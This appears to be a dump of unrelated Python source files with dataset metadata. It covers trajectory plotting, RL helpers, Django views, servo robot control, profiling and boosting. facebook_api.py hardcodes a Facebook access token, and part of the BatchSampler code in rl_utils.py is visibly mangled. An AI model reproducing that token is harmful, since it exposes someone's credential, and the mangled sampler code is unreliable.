(60 ** 2 * 24))\n v_threshold = ((0.75 * 0.25 * lat_length) / self.timestep \n * np.ones(np.size(time)))\n v_threshold = v_threshold[:, np.newaxis]\n v_diff = v_threshold - self.trajectory_v\n\n u_threshold = (0.75 * 0.25 * lat_length \n * np.cos(np.radians(self.latitudes))) / self.timestep\n u_diff = u_threshold - self.trajectory_u\n\n zero = np.zeros(np.size(time))\n \n # new style method 1; unpack the axes\n fig, (ax1, ax2) = plt.subplots(2, 1, sharex=True, sharey=True)\n u_line = ax1.plot(time, u_diff, color=\"black\", linewidth=1)\n u_zero_line = ax1.plot(time, zero, color=\"black\", linestyle=\"--\",\n linewidth=2)\n ax1.set_title(\"Dynamic Trajectory Zonal Speeds\")\n\n v_line = ax2.plot(time, v_diff, color=\"black\", linewidth=1)\n v_zero_line = ax2.plot(time, zero, color=\"black\", linestyle=\"--\",\n linewidth=2)\n ax2.set_title(\"Dynamic Trajectory Meridional Speeds\")\n\n plt.xlabel(\"Time in days\")\n plt.ylabel(\" \" #label padding\n \"Velocity in m/s\")\n #plt.savefig(\"plots/timestep_friction_120.eps\")\n #plt.show()\n return ax1, ax2\n\n def threshold(self):\n \"\"\" Difference between model and HYSPLIT threshold speeds. \"\"\"\n lat_length = 111.32e3 # Length of a degree of latitude in meters\n time = np.arange(np.size(self.latitudes[:,0])) * (self.timestep \n / (60 ** 2 * 24))\n v_threshold = ((0.75 * 0.25 * lat_length) / self.timestep \n * np.ones(np.size(time)))\n v_threshold = v_threshold[:, np.newaxis]\n v_diff = v_threshold - self.trajectory_v\n\n u_threshold = (0.75 * 0.25 * lat_length \n * np.cos(np.radians(self.latitudes))) / self.timestep\n u_diff = u_threshold - self.trajectory_u\n return u_diff, v_diff, time\n\n def graph_rms(self):\n \"\"\" Graph of rms distance from mean trajectory. \"\"\"\n rms = self.rms_distance()\n\n fig = plt.figure()\n ax2 = fig.add_subplot(1, 1, 1)\n\n rms_line, = ax2.plot(self.times, rms)\n #t_half_line, = ax2.plot(self.times, self.times ** 0.5)\n \n ax2.set_title(\"RMS Distance from Mean Trajectory\")\n ax2.set_xlabel(\"Time (hours)\")\n ax2.set_ylabel(\"RMS distance (m)\")\n plt.show()\n return rms[-1]\n\ndef trajectory_subplots():\n location = \"boston\"\n map_type = \"ortho\"\n lat_center = 90\n lon_center = -71\n\n trajectory_friction = Trajectory(scheme=\"friction\", timestep=90,\n source=\"model\", location=location)\n trajectory_grid = Trajectory(scheme=\"grid\", timestep=90, \n source=\"model\", location=location)\n trajectory_3d = Trajectory(scheme=\"friction\", timestep=90, \n source=\"hysplit\", location=location, vertical=\"3D\")\n trajectory_iso = Trajectory(scheme=\"grid\", timestep=90, \n source=\"hysplit\", location=location, vertical=\"isobaric\")\n\n fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, sharex=True, sharey=True, \n figsize=(8, 8))\n\n if map_type == \"ortho\":\n ax1.set_title(\"Kinematic Model\")\n map = Basemap(projection='ortho', lon_0=lon_center, lat_0=lat_center, \n resolution='c', ax=ax1)\n map.drawcoastlines(linewidth=0.25, color='gray')\n map.drawcountries(linewidth=0)\n map.fillcontinents(color='white',lake_color='white', zorder=1)\n map.drawmapboundary(fill_color='white')\n map.plot(trajectory_grid.longitudes, trajectory_grid.latitudes,\n latlon=True, zorder=2, color='black')\n\n ax2.set_title(\"Dynamic Model\")\n map = Basemap(projection='ortho', lon_0=lon_center, lat_0=lat_center, \n resolution='c', ax=ax2)\n map.drawcoastlines(linewidth=0.25, color='gray')\n map.drawcountries(linewidth=0)\n map.fillcontinents(color='white',lake_color='white', zorder=1)\n map.drawmapboundary(fill_color='white')\n map.plot(trajectory_friction.longitudes, trajectory_friction.latitudes,\n latlon=True, zorder=2, color='black')\n\n ax3.set_title(\"3D HYSPLIT\")\n map = Basemap(projection='ortho', lon_0=lon_center, lat_0=40, \n resolution='c', ax=ax3)\n map.drawcoastlines(linewidth=0.25, color='gray')\n map.drawcountries(linewidth=0)\n map.fillcontinents(color='white',lake_color='white', zorder=1)\n map.drawmapboundary(fill_color='white')\n map.plot(trajectory_3d.longitudes, trajectory_3d.latitudes,\n latlon=True, zorder=2, color='black')\n\n ax4.set_title(\"Isobaric HYSPLIT\")\n map = Basemap(projection='ortho', lon_0=lon_center, lat_0=lat_center, \n resolution='c', ax=ax4)\n map.drawcoastlines(linewidth=0.25, color='gray')\n map.drawcountries(linewidth=0)\n map.fillcontinents(color='white',lake_color='white', zorder=1)\n map.drawmapboundary(fill_color='white')\n map.plot(trajectory_iso.longitudes, trajectory_iso.latitudes,\n latlon=True, zorder=2, color='black')\n\n plt.savefig(\"plots/four_ortho.pdf\")\n\n plt.show()\n \n\ndef speed_subplots():\n \"\"\" Graph u and v speeds for two schemes. \"\"\"\n trajectory_friction = Trajectory(scheme=\"friction\", timestep=180, \n source=\"model\")\n trajectory_grid = Trajectory(scheme=\"grid\", timestep=180, source=\"model\")\n\n fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, sharex=True, sharey=True, \n figsize=(10, 6))\n # add a big axis, hide frame\n fig.add_subplot(111, frameon=False)\n # hide tick and tick label of the big axes\n plt.tick_params(labelcolor='none', top='off', bottom='off', left='off', \n right='off')\n\n (u_diff_grid, v_diff_grid, time) = trajectory_grid.threshold()\n (u_diff_friction, v_diff_friction, time) = trajectory_friction.threshold()\n zero = np.zeros(np.size(u_diff_grid[:,0]))\n\n ax1.plot(time, -u_diff_grid, color=\"black\", linewidth=1)\n ax1.plot(time, zero, color=\"black\", linestyle=\"--\", linewidth=2)\n ax1.set_title(\"Kinematic Trajectory Zonal Speeds\", fontsize=12)\n ax1.set_ylim(-290, 45)\n\n ax2.plot(time, -u_diff_friction, color=\"black\", linewidth=1)\n ax2.plot(time, zero, color=\"black\", linestyle=\"--\", linewidth=2)\n ax2.set_title(\"Dynamic Trajectory Zonal Speeds\", fontsize=12)\n ax2.set_ylim(-290, 45)\n\n ax3.plot(time, -v_diff_grid, color=\"black\", linewidth=1)\n ax3.plot(time, zero, color=\"black\", linestyle=\"--\", linewidth=2)\n ax3.set_title(\"Kinematic Trajectory Meridional Speeds\", fontsize=12)\n ax3.set_ylim(-290, 45)\n\n ax4.plot(time, -v_diff_friction, color=\"black\", linewidth=1)\n ax4.plot(time, zero, color=\"black\", linestyle=\"--\", linewidth=2)\n ax4.set_title(\"Dynamic Trajectory Meridional Speeds\", fontsize=12)\n ax4.set_ylim(-290, 45)\n\n plt.xlabel(\"Time (days)\")\n plt.ylabel(\"Velocity (m/s) \")\n\n plt.savefig(\"plots/speed_subplots_180_negative.pdf\")\n\n plt.show()\n\ndef deviation():\n # Need to fix this probably\n scheme = \"friction\"\n location = \"barau\"\n vertical = \"isobaric\"\n num_trajectories = 25\n\n experimental = Trajectory(scheme=scheme, timestep=90, source=\"model\", \n location=location)\n reference = Trajectory(scheme=scheme, timestep=90, source=\"hysplit\", \n location=location, vertical=vertical)\n\n # Find indices of times in experimental that match times in reference\n time_index = np.searchsorted(experimental.times, reference.times)[:,0]\n\n # Select times, latitudes and longitudes from experimental in reference\n reduced_times = experimental.times[time_index]\n reduced_latitudes = experimental.latitudes[time_index]\n reduced_longitudes = experimental.longitudes[time_index]\n\n distance = haversine(reduced_latitudes, reduced_longitudes,\n reference.latitudes, reference.longitudes)\n\n ahtd = np.sqrt(np.sum(distance ** 2, axis=1)) / num_trajectories\n mean_distance = np.sqrt(np.sum(distance, axis=1)) / num_trajectories\n\n reference_distance = haversine(reference.latitudes[1:,:], \n reference.longitudes[1:,:], reference.latitudes[:-1,:],\n reference.longitudes[:-1,:]) \n\n l_h = (np.sum(np.sqrt(np.sum(reference_distance ** 2, axis=1))) \n / num_trajectories)\n\n rhtd = ahtd / l_h\n\n fig = plt.figure()\n ax1 = fig.add_subplot(1, 1, 1)\n\n ax1.plot(reduced_times, ahtd)\n #t_half_line, = ax2.plot(self.times, self.times ** 0.5)\n\n ax1.set_xlabel(\"Time (hours)\")\n ax1.set_ylabel(\"RHTD\")\n plt.show()\n\n return rhtd\n\ndef reference_deviation():\n location = \"boston\"\n num_trajectories = 25\n\n reference_3d = Trajectory(timestep=90, source=\"hysplit\", \n location=location, vertical=\"3D\")\n reference_iso = Trajectory(timestep=90, source=\"hysplit\", \n location=location, vertical=\"isobaric\")\n\n distance = haversine(reference_3d.latitudes, reference_3d.longitudes,\n reference_iso.latitudes, reference_iso.longitudes)\n\n ahtd = np.sqrt(np.sum(distance ** 2, axis=1)) / num_trajectories\n\n reference_distance = haversine(reference_3d.latitudes[1:,:], \n reference_3d.longitudes[1:,:], reference_iso.latitudes[:-1,:],\n reference_iso.longitudes[:-1,:]) \n\n l_h = (np.sum(np.sqrt(np.sum(reference_distance ** 2, axis=1))) \n / num_trajectories)\n\n rhtd = ahtd / l_h\n\n return rhtd\n\ntrajectory_subplots()\n#print(\"rhtd is \\n\", rhtd)\n#print(\"last rhtd is\", rhtd[-1])\n\n# tra = Trajectory(scheme=\"friction\", timestep=90, source=\"model\", \n# location=\"barau\", vertical=\"3D\")\n# tra.plot_ortho()\n# last_rms = tra.graph_rms()\n# print(\"Last RMSE value is\", last_rms)","sub_path":"trajectory_from_file.py","file_name":"trajectory_from_file.py","file_ext":"py","file_size_in_byte":16274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"474707631","text":"# Some helper functions for using garage\n\n\nimport numpy as np\nimport torch\n\nfrom garage.torch.policies import GaussianMLPPolicy, TanhGaussianMLPPolicy, DeterministicMLPPolicy\nfrom garage.torch.q_functions import ContinuousMLPQFunction\nfrom garage.torch.value_functions import GaussianMLPValueFunction\nfrom garage.sampler import FragmentWorker, LocalSampler, RaySampler\nfrom garage.torch.optimizers import OptimizerWrapper\n\n\ndef get_mlp_policy(*,\n env_spec,\n stochastic=True,\n clip_output=False,\n hidden_sizes=(64, 64),\n hidden_nonlinearity=torch.tanh,\n min_std=np.exp(-20.),\n max_std=np.exp(2.)):\n\n if stochastic and clip_output:\n return TanhGaussianMLPPolicy(\n env_spec=env_spec,\n hidden_sizes=hidden_sizes,\n hidden_nonlinearity=hidden_nonlinearity,\n output_nonlinearity=None,\n min_std=min_std,\n max_std=max_std)\n\n if stochastic and not clip_output:\n return GaussianMLPPolicy(env_spec,\n hidden_sizes=hidden_sizes,\n hidden_nonlinearity=hidden_nonlinearity,\n output_nonlinearity=None)\n\n if not stochastic:\n return DeterministicMLPPolicy(\n env_spec=env_spec,\n hidden_sizes=hidden_sizes,\n hidden_nonlinearity=hidden_nonlinearity,\n output_nonlinearity=torch.tanh if use_tanh else None)\n\n\n\ndef get_mlp_value(form='Q',\n *,\n env_spec,\n hidden_sizes=(256, 128),\n hidden_nonlinearity=torch.tanh,\n ensemble_size=1,\n ensemble_mode='P'\n ):\n\n if form=='Q':\n return ContinuousMLPQFunction(\n env_spec=env_spec,\n hidden_sizes=hidden_sizes,\n hidden_nonlinearity=hidden_nonlinearity,\n output_nonlinearity=None)\n if form=='V':\n return GaussianMLPValueFunction(\n env_spec=env_spec,\n hidden_sizes=hidden_sizes,\n hidden_nonlinearity=hidden_nonlinearity,\n output_nonlinearity=None,\n learn_std=False)\n\n\n\ndef collect_episode_batch(policy, *,\n env,\n batch_size,\n n_workers=4):\n \"\"\"Obtain one batch of episodes.\"\"\"\n sampler = get_sampler(policy, env=env, n_workers=n_workers)\n agent_update = policy.get_param_values()\n episodes = sampler.obtain_samples(0, batch_size, agent_update)\n return episodes\n\nfrom garage.sampler import Sampler\nimport copy\nfrom garage._dtypes import EpisodeBatch\nclass BatchSampler(Sampler):\n\n def __init__(self, episode_batch, randomize=True):\n self.episode_batch = episode_batch\n self.randomize = randomize\n self._counter = 0\n\n def obtain_samples(self, itr, num_samples, agent_update, env_update=None):\n\n ns = self.episode_batch.lengths\n if num_samples=num_samples)[0]\n if len(itemindex)>0:\n ld = self.episode_batch.to_list()\n j_max = min(len(ld), itemindex[0]+1)\n ld = [ld[i] for i in ind[:j_max].tolist()]\n sampled_eb = EpisodeBatch.from_list(self.episode_batch.env_spec,ld)\n else:\n sampled_eb = None\n else:\n ns = self.episode_batch.lengths\n ind = np.arange(len(ns))\n cumsum_permuted_ns = np.cumsum(ns[ind])\n counter = int(self._counter)\n itemindex = np.where(cumsum_permuted_ns>=num_samples*(counter+1))[0]\n itemindex0 = np.where(cumsum_permuted_ns>num_samples*counter)[0]\n if len(itemindex)>0:\n ld = self.episode_batch.to_list()\n j_max = min(len(ld), itemindex[0]+1)\n j_min = itemindex0[0]\n ld = [ld[i] for i in ind[j_min:j_max].tolist()]\n sampled_eb = EpisodeBatch.from_list(self.episode_batch.env_spec,ld)\n self._counter+=1\n else:\n sampled_eb = None\n else:\n sampled_eb = self.episode_batch\n\n return sampled_eb\n\n def shutdown_worker(self):\n pass\n\n\ndef get_sampler(policy,\n *,\n env,\n n_workers=4,\n **kwargs): # other kwargs for the sampler\n\n if n_workers==1:\n return LocalSampler(agents=policy,\n envs=env,\n max_episode_length=env.spec.max_episode_length,\n worker_class=FragmentWorker,\n **kwargs)\n else:\n return RaySampler(agents=policy,\n envs=env,\n max_episode_length=env.spec.max_episode_length,\n n_workers=n_workers,\n **kwargs)\n\n\n\nfrom garage.replay_buffer import PathBuffer\n\ndef get_replay_buferr(capacity=int(1e6)):\n return PathBuffer(capacity_in_transitions=capacity)\n\ndef get_optimizer(obj, lr,\n *,\n max_optimization_epochs=1,\n minibatch_size=128):\n\n return OptimizerWrapper((torch.optim.Adam, dict(lr=lr)),\n obj,\n max_optimization_epochs=max_optimization_epochs,\n minibatch_size=minibatch_size)","sub_path":"hurl/rl_utils.py","file_name":"rl_utils.py","file_ext":"py","file_size_in_byte":5979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"604466910","text":"from django.shortcuts import render\nfrom .models import Post1\nfrom .forms import PostForm\nfrom django.shortcuts import redirect, render\nfrom django.utils import timezone\nfrom django.contrib.auth.models import User\nfrom user_info.models import UserInfo, CustomUser\n\ndef FAQ(request):\n try:\n user = CustomUser.objects.get(email=request.user.email)\n except:\n return render(request, 'FAQ.html')\n \n post1 = Post1.objects.filter(writer=user) # 내가 쓴글만\n return render(request, 'FAQ.html', {'post1': post1})\n\n\ndef CS(request):\n if request.method == 'POST':\n post1 = Post1()\n post1.title = request.POST['title']\n post1.body = request.POST['body']\n post1.writer = CustomUser.objects.get(email=request.user.email)\n post1.post_time = str(timezone.now())[0:19]\n post1.save()\n return redirect('user_info:home')\n else:\n form = PostForm()\n return render(request, 'CS.html',{'post':form})","sub_path":"inquiry/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"277596053","text":"import sys\n\ndef showhelp():\n help = \"\"\"\n Usage: translate [word or sentence]\n \"\"\"\n print(help)\n\n\ndef main(args=None):\n from .translate import tword\n if args is None :\n args = sys.argv[1:]\n\n if len(args) < 0:\n showhelp()\n else :\n tword(' '.join(args))\n\nif __name__ == \"__main__\":\n main()","sub_path":"src/translate/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"264288484","text":"#full documentation at: http://nodotcom.org/python-facebook-tutorial.html\n\nimport facebook, os\n\ndef photo_poster(image_obj=None, caption=None, photo_id=None):\n # Fill in the values noted in documentation here:\n\n PAGE_ID = '1812492382364506'#os.environ.get('FACEBOOK_PAGE_ID')\n ACCESS_TOKEN = 'EAAQWkmy1MFYBAF4kDKRuQ8fjj2ocphX9vzijqY0SFbT5IfmRG9bvzfyamBMVGllsABmXORILAPH9qmYojcTNpZBHM8wx2ZCxOFMdOuZCRgOuqYixCrsVgbD4bhFoa8yxMGwISqPOBZAqviGQlcZB7induz6m8ZAfcZD'#os.environ.get('FACEBOOK_ACCESS_TOKEN')\n\n cfg = {\n \"page_id\" : PAGE_ID, # Step 1\n \"access_token\" : ACCESS_TOKEN # Step 3\n }\n caption = caption+\" (https://damadam.pk/photo_detail/\"+str(photo_id)+\")\"\n # print cfg\n api = get_api(cfg)\n status = api.put_photo(image=(image_obj),message=caption)\n # print \"status: %s\" % status\n\ndef get_api(cfg):\n graph = facebook.GraphAPI(cfg['access_token'])\n # Get page token to post as the page. You can skip \n # the following if you want to post as yourself. \n resp = graph.get_object('me/accounts')\n # resp = graph.get_object('10154886323073885/accounts')\n # print \"getting own account: %s\" % resp\n page_access_token = None\n for page in resp['data']:\n if page['id'] == cfg['page_id']:\n page_access_token = page['access_token']\n graph = facebook.GraphAPI(page_access_token)\n return graph \n # You can also skip the above if you get a page token:\n # http://stackoverflow.com/questions/8231877/facebook-access-token-for-pages\n # and make that long-lived token as in Step 3\n","sub_path":"links/facebook_api.py","file_name":"facebook_api.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"446672367","text":"from adafruit_servokit import ServoKit\nfrom time import sleep\n\n''' PIN MAP:\n [0] is tail\n [1] is mid-tail\n [2] is hip\n [3] is mid-head\n [4] is head\n [5] is suction cup\n'''\n\nEXTEND = [65, 100, 90, 110, 65, -1]\nCURL = [170, 0, -1, 0, 159, -1]\n\nclass Robot:\n def __init__(self):\n self.kit = ServoKit(channels=16)\n self._unstick()\n self._set_all(EXTEND)\n\n self.stuck = False\n\n def _set_all(self, arr):\n \"\"\"\n _set_all(arr) - sets all servos to the values in the array\n :param arr: the array of ints for the servos angles. Use -1 to skip value\n :return: none\n \"\"\"\n for i in range(0,len(arr)):\n if arr[i] == -1:\n continue\n else:\n self.kit.servo[i].angle = arr[i]\n\n def _stick(self):\n \"\"\"\n _stick() - sticks the suction cup\n :return: none\n \"\"\"\n self.kit.servo[5].angle = 60\n self.stuck = True\n\n def _unstick(self):\n \"\"\"\n _unstick() - unsticks the suction cup\n :return: none\n \"\"\"\n self.kit.servo[5].angle = 130\n self.stuck = False\n\n def _curl_up(self):\n \"\"\"\n _curl_up() - arches the inchworm robot's back\n :return: none\n \"\"\"\n self._set_all(CURL)\n\n def _extend(self):\n \"\"\"\n _extend - straightens the inchworm robot's back\n :return: none\n \"\"\"\n self.kit.servo[0].angle = 120\n self.kit.servo[1].angle = 60\n sleep(0.15)\n self.kit.servo[3].angle = 20\n self.kit.servo[4].angle = 130\n sleep(0.15)\n self.kit.servo[3].angle = 60\n self.kit.servo[4].angle = 100\n sleep(0.15)\n self._set_all(EXTEND)\n\n def crawl(self):\n \"\"\"\n crawl() - executes the crawl sequence for the robot\n :return: none\n \"\"\"\n self._stick()\n sleep(0.5)\n self._curl_up()\n sleep(0.5)\n self._unstick()\n sleep(0.5)\n self._extend()\n sleep(0.5)\n\n def dance(self, cycles):\n \"\"\"\n dance() - does a little dance\n :param cycles: the number of dance wiggles to do\n :return: none\n \"\"\"\n for i in range(0,cycles):\n self.kit.servo[2].angle = 135\n sleep(0.5)\n self.kit.servo[2].angle = 90\n sleep(0.1)\n self.kit.servo[2].angle = 45\n sleep(0.5)\n self.kit.servo[2].angle = 90\n sleep(0.1)\n\n def turn(self, degrees):\n \"\"\"\n turn(degrees) - turns the robot in maximum steps of 45 degrees\n :param degrees: the total number of degrees to turn\n :return: none\n \"\"\"\n while degrees > 90 or degrees < -90:\n if degrees > 90:\n self.turn(90)\n degrees -= 90\n elif degrees < -90:\n self.turn(-90)\n degrees += 90\n\n self.kit.servo[2].angle = 90 + degrees\n sleep(0.5)\n self._stick()\n sleep(0.5)\n self.kit.servo[2].angle = 90\n sleep(0.5)\n self._unstick()\n sleep(0.5)\n\n def suction(self):\n if self.stuck:\n self._unstick()\n else:\n self._stick()\n","sub_path":"robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"310036838","text":"import os\nimport numpy as np\n\nscan_folder_rel = 'simulations_less_mps'\n\nenvironment_preparation = f'''\nsource /afs/cern.ch/work/g/giadarol/sim_workspace_mpi_py3/venvs/py3/bin/activate\nsource /afs/cern.ch/work/g/giadarol/sim_workspace_mpi_py3/setpythopath\nPYTHONPATH=$PYTHONPATH:{os.path.abspath('../')}\n'''\n# Last one is to get response matrix path\n\nstrength_scan = np.arange(0.02, 2.01, 0.02)\n\nfiles_to_be_copied = [\n '../004_instability_simulation/000_simulation_matrix_map.py',\n '../004_instability_simulation/run_it_several_times',\n ]\n\nsettings_to_be_replaced_in = '000_simulation_matrix_map.py'\n\n\nscan_folder_abs = os.getcwd() + '/' + scan_folder_rel\nos.mkdir(scan_folder_abs)\n\n# prepare scan\nfor ii in range(len(strength_scan)):\n\n # Make directory\n current_sim_ident= f'strength_{strength_scan[ii]:.2e}'\n print(current_sim_ident)\n current_sim_abs_path = scan_folder_abs+'/'+current_sim_ident\n os.mkdir(current_sim_abs_path)\n\n # Copy files\n for ff in files_to_be_copied:\n os.system(f'cp {ff} {current_sim_abs_path}')\n\n # Replace settings section\n settings_section = f'''# start-settings-section\nn_terms_to_be_kept = 200\nn_tail_cut = 10\nrecenter_all_slices = True # Cancels initial kick from input\n\nQp_x = 0.\nQp_y = 0.\nplane = 'y'\n\necloud_strength_scale = {strength_scan[ii]:e}\n\nsim_param_file = '../../../reference_simulation/Simulation_parameters.py'\nsim_param_amend_files = ['../../../Simulation_parameters_amend.py',\n 'Simulation_parameters_amend_for_matrixsim.py']\n\ninclude_response_matrix = True\nresponse_data_file = '../../../001_sin_response_scan/response_data_y_processed.mat'\n\ninclude_detuning_with_z = True\nonly_phase_shift = True\nadd_alpha_0_to_tune = False\nfactor_alpha_0_to_tune = 0.\nz_strength_file = '../../../000a_sin_response_unperturbed_pinch/linear_strength_y.mat'\ndetuning_fit_order = 20\nN_poly_cut = detuning_fit_order + 1\nalpha_N_custom = []\n\ninclude_non_linear_map = False\nflag_wrt_bunch_centroid = False\nfield_map_file = '../../../003_generate_field_map/field_map_lin.mat'\n# end-settings-section'''\n\n sim_param_amend_curr= f'''\nN_turns = 8000\n\nenable_transverse_damper = False\nV_RF = 6e6\nlongitudinal_mode = 'linear'\n\nn_slices = 200\nmacroparticles_per_slice = 2000\nn_macroparticles = macroparticles_per_slice*n_slices\n'''\n\n with open(current_sim_abs_path\n + '/Simulation_parameters_amend_for_matrixsim.py', 'w') as fid:\n fid.write(sim_param_amend_curr)\n\n with open(current_sim_abs_path+'/'+settings_to_be_replaced_in, 'r') as fid:\n lines = fid.readlines()\n istart = np.where([ss.startswith('# start-settings-section') for ss in lines])[0][0]\n iend = np.where([ss.startswith('# end-settings-section') for ss in lines])[0][0]\n with open(current_sim_abs_path+'/'+settings_to_be_replaced_in, 'w') as fid:\n fid.writelines(lines[:istart])\n fid.write(settings_section + '\\n')\n fid.writelines(lines[iend+1:])\n\n # Prepare run script\n run_script_curr= '''#!/bin/bash\nfor i in {1..1}\ndo\n echo \"Iteration $i\"\n if test -f \"met_stop_condition\"; then\n\t echo \"Met stop condition!\"\n\t break\n fi\n python 000_simulation_matrix_map.py\ndone\n '''\n with open(current_sim_abs_path + '/run_it_several_times', 'w') as fid:\n fid.write(run_script_curr)\n\n # Prepare job script\n job_content = f'''#!/bin/bash\n\n{environment_preparation}\n\n# Environment preparation\necho PYTHONPATH=$PYTHONPATH\necho which python\nwhich python\n\ncd {current_sim_abs_path}\n\nbash run_it_several_times\n'''\n with open(current_sim_abs_path + '/job.job', 'w') as fid:\n fid.write(job_content)\n\n# Prepare htcondor cluster of jobs\nimport PyPARIS_sim_class.htcondor_config as htcc\nhtcc.htcondor_config(\n scan_folder_abs,\n time_requirement_days=2., # 120 minutes\n htcondor_files_in=scan_folder_abs)\n","sub_path":"005t2_dipolar_and_phase_shift/000_config_scan.py","file_name":"000_config_scan.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"80956702","text":"import load_policy\nimport numpy as np\n\n\nclass Expert(object):\n def __init__(self, env_fn, expert_fpath):\n self.env = env_fn()\n self.policy_fn = load_policy.load_policy(expert_fpath)\n\n def policy(self, obs):\n return self.policy_fn(obs[None, :])\n\n def evaluate(self):\n print('\\n Evaluating Expert...')\n num_episodes = 10\n rewards = []\n env = self.env\n\n for _ in range(num_episodes):\n total_rewards = 0.\n obs = env.reset()\n while True:\n action = self.policy(obs)\n new_obs, reward, done, _ = env.step(action)\n obs = new_obs\n total_rewards += reward\n if done:\n break\n rewards.append(total_rewards) \n\n print(f'reward: {np.mean(rewards)}+-{np.std(rewards)}')\n\n\nif __name__ == '__main__':\n import gym\n import tensorflow as tf\n env_fn = lambda: gym.make('Hopper-v2')\n with tf.Session():\n expert = Expert(env_fn, 'experts/Hopper-v2.pkl')\n expert.evaluate()\n","sub_path":"hw1/expert.py","file_name":"expert.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"596077787","text":"import resource\nimport yappi\n\nfrom spardaqus import globals\nfrom spardaqus.core.utils import nowstr, info\n\n\ndef _m(x):\n return str(round(x / 1024.0 / globals.RSS_MEMORY_DIVISOR, 3))\n\n\ndef memory():\n \"\"\"Take an available memory measurement. If larger than the current value of globals.MAX_RSS_MEMORY_USED,\n replace globals.MAX_RSS_MEMORY_USED with the new value. At EOP, globals.MAX_RSS_MEMORY_USED will contain\n the largest point in time amount of memory used by Spardaqus.\"\"\"\n curr_mem_used = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss - globals.RSS_MEMORY_BASE\n if curr_mem_used > globals.MAX_RSS_MEMORY_USED:\n globals.MAX_RSS_MEMORY_USED = curr_mem_used\n if globals.LAST_RSS_MEMORY_USED == 0:\n info(\"--profile: memory in use: %s MB so far\" % _m(curr_mem_used))\n else:\n pct_change = str(round((curr_mem_used - globals.LAST_RSS_MEMORY_USED) / globals.LAST_RSS_MEMORY_USED * 100.0, 2))\n if curr_mem_used > globals.LAST_RSS_MEMORY_USED:\n pct_change = \"+%s%%; \" % pct_change\n info(\"** --profile: memory in use: %s MB (%s%s max MB so far)\" %\n (_m(curr_mem_used),\n pct_change,\n _m(globals.MAX_RSS_MEMORY_USED)))\n elif curr_mem_used < globals.LAST_RSS_MEMORY_USED:\n pct_change = \"%s%%; \" % pct_change\n info(\"** --profile: memory in use: %s MB (%s%s max MB so far)\" %\n (_m(curr_mem_used),\n pct_change,\n _m(globals.MAX_RSS_MEMORY_USED)))\n globals.LAST_RSS_MEMORY_USED = curr_mem_used\n\n\ndef start(tag=None):\n \"\"\"Starts a yappi profiling session.\"\"\"\n\n pstats_file = '/var/log/spardaqus/yappi.%s.%s.%s%s' % (globals.__NAME__, globals.__VERSION__, \"%s.\" % tag if tag else \"\", nowstr())\n yappi.clear_stats()\n yappi.start()\n info(\"** --profile specified; performance profiling started\")\n info(\"** --profile pstats data will be written to %s\" % pstats_file)\n return pstats_file\n\n\ndef end(pstats_file):\n \"\"\"Ends yappi profiling session, saves the profilinf info to a CProfile pstats file, and pretty-prints it to the console.\"\"\"\n yappi.stop()\n func_stats = yappi.get_func_stats()\n if func_stats:\n _rows = []\n for _stat in func_stats._as_dict:\n if '/Spardaqus/' in _stat.full_name and '/venv/' not in _stat.full_name:\n _gizmo = _stat.full_name.split(\"/\")[-1]\n _rows.append([_gizmo.split(\" \")[1], _gizmo.split(\" \")[0], _stat.ncall, _stat.tavg, _stat.ttot, _stat.tsub])\n info(\"*\")\n info(\"* TOP 50 CALLS BY TOT TIME\")\n info(\"*\")\n _hdr = [\"NAME\", \"LOCATION\", \"CALLS\", \"AvgTIME\", \"TotTIME\", \"TotTIMELessSubcalls\"]\n info(\"{: <40} {: <32} {: >12} {: >24} {: >24} {: >24}\".format(*_hdr))\n _rows.sort(key=lambda x: x[4], reverse=True)\n i = 0\n for _row in _rows:\n info(\"{: <40} {: <32} {: >12} {: >24} {: >24} {: >24}\".format(*_row))\n i += 1\n if i == 50:\n break\n info(\"*\")\n info(\"* TOP 50 CALLS BY NUMBER OF CALLS\")\n info(\"*\")\n info(\"{: <40} {: <32} {: >12} {: >24} {: >24} {: >24}\".format(*_hdr))\n _rows.sort(key=lambda x: x[2], reverse=True)\n i = 0\n for _row in _rows:\n info(\"{: <40} {: <32} {: >12} {: >24} {: >24} {: >24}\".format(*_row))\n i += 1\n if i == 50:\n break\n func_stats.save(pstats_file, type='pstat')\n yappi.clear_stats()","sub_path":"spardaqus/core/profiling.py","file_name":"profiling.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"349542971","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# \"Open\n\n# ## Simple Holenstein Boosting Algorithm\n# ### Based on Dr. Russell Impagliazzo's paper\n\n# In[1]:\n\n\n# imports\n\nimport math\nimport numpy as np\nimport random\nfrom numpy.random import choice\nfrom numba import jit, njit\n\nfrom sklearn.tree import DecisionTreeClassifier\n\n\n# Aggregating weak learners using simple holenstein boosting algorithm\n\nclass HolensteinBoostClassifier:\n\n def __init__(self, max_depth=1, eps=0.05):\n\n self.weak_learners = []\n self.max_depth = max_depth\n self.eps = eps\n\n\n def fit(self, X, y, n_estimators=100):\n \"\"\"\n :param X: nd-array of training instances\n :param y: 1d-array of labels\n :param n_estimators: int representing the number of weak learners to train. default of 100\n :return: none\n \"\"\"\n\n n = len(X)\n size = n // 10 # size of subsample for training each tree\n weights = np.full(n, 1/n) # uniform distribution\n\n\n self.weak_learners = []\n for _ in 